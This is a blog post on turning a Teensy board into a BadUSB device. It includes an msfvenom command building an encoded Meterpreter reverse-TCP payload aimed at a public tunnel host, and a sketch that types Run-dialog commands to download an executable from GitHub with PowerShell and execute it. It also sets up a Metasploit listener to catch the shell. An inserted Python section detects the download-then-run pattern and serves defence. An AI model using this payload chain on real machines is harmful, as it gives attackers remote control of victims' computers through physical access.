| title | date | tags | layout |
| --- | --- | --- | --- |
| Penetration Testing Tool: Teensy (a Budget BadUSB) | 2018-09-25 | kali | post |
```
⚡ /home/da1sy/arduino-1.8.7# ./arduino
⚡ /home/da1sy/arduino-1.8.7# ./TeensyduinoInstall.linux64
```
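Note: install the plugin into the directory where Arduino was extracted.

After opening the software, change the settings under the Tools menu as follows: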
```
⚡/home/da1sy/桌面/linux_amd64# ./sunny clientid <tunnel ID>
⚡/home/da1sy# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=free.idcfengye.com lport=17839 -f exe > windows.exe
```

`lhost` is the domain shown after running sunny, and `lport` is the port entered when the tunnel was opened (it is also displayed once sunny is running).
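```cpp
char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://raw.githubusercontent.com/da1sy/da1sy/master/windows.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file); ";
char *command2 = "%HOMEPATH%\\windows.exe ";
// Change the download URL to your own GitHub address

void setup() {
  delay(5000);        // wait 5 s after the board is plugged in
  omg(command1);      // first Run-dialog command: download the file
  delay(15000);       // wait 15 s for the download
  omg(command2);      // second Run-dialog command: start the file
}

void loop() {}

// Opens the Run dialog (Win+R) and types the given command followed by Enter.
void omg(char *SomeCommand)
{
  Keyboard.set_modifier(128);   // 128 = GUI (Windows) key held
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  Keyboard.set_modifier(0);     // release all keys
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1500);
  Keyboard.println(SomeCommand);
}
```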
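The sketch leaves a recognisable trace on the host: explorer.exe starts PowerShell with a `System.Net.WebClient` download, and about 15 seconds later explorer.exe starts the file that was just written. A detection for that pair, added here as an example and not part of the original post; the event field names, the sample records, the assumption that the Run dialog has already expanded `%HOMEPATH%`, and the 60-second window are all assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records (fields modelled on Sysmon Event ID 1).
# Assumption: the Run dialog expanded %HOMEPATH% before the command was logged.
EVENTS = [
    {"time": "2018-09-25T10:00:05", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -Command $clnt = new-object System.Net.WebClient;"
                "$url= 'https://example.invalid/sample.exe';"
                r"$file = ' \Users\alice\sample.exe ';$clnt.DownloadFile($url,$file);"},
    {"time": "2018-09-25T10:00:21", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\sample.exe", "cmdline": r"\Users\alice\sample.exe"},
    {"time": "2018-09-25T10:05:00", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

DOWNLOAD = re.compile(r"net\.webclient.*downloadfile", re.I | re.S)
QUOTED = re.compile(r"'\s*([^']+?)\s*'")

def from_explorer(ev):
    # Commands typed into the Run dialog are started by explorer.exe.
    return ev["parent"].lower().endswith("\\explorer.exe")

def local_targets(cmdline):
    # Quoted arguments that are not URLs: candidate download destinations.
    return [s.lower() for s in QUOTED.findall(cmdline) if "://" not in s]

def find_download_then_run(events, window=timedelta(seconds=60)):
    """Pair a WebClient download launched from explorer.exe with a later
    explorer.exe launch of the downloaded file inside `window`."""
    hits, pending = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        if not from_explorer(ev):
            continue
        when = datetime.fromisoformat(ev["time"])
        if ev["image"].lower().endswith("powershell.exe") and DOWNLOAD.search(ev["cmdline"]):
            pending += [(when, t, ev) for t in local_targets(ev["cmdline"])]
            continue
        for started, target, download in pending:
            if when - started <= window and ev["image"].lower().endswith(target):
                hits.append((download, ev))
    return hits

if __name__ == "__main__":
    for download, run in find_download_then_run(EVENTS):
        print("download:", download["time"], "->", "run:", run["time"], run["image"])
```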
```
⚡ /home/da1sy/# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set lhost 127.0.0.1
msf exploit(multi/handler) > set lport 6666 // the local address and port entered when opening the ngrok tunnel
msf exploit(multi/handler) > exploit
```
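The result looks like this:

Listener side:

The session that finally connected back seems to have had a glitch, but overall it's not a big problem.

I'll add more when I have time.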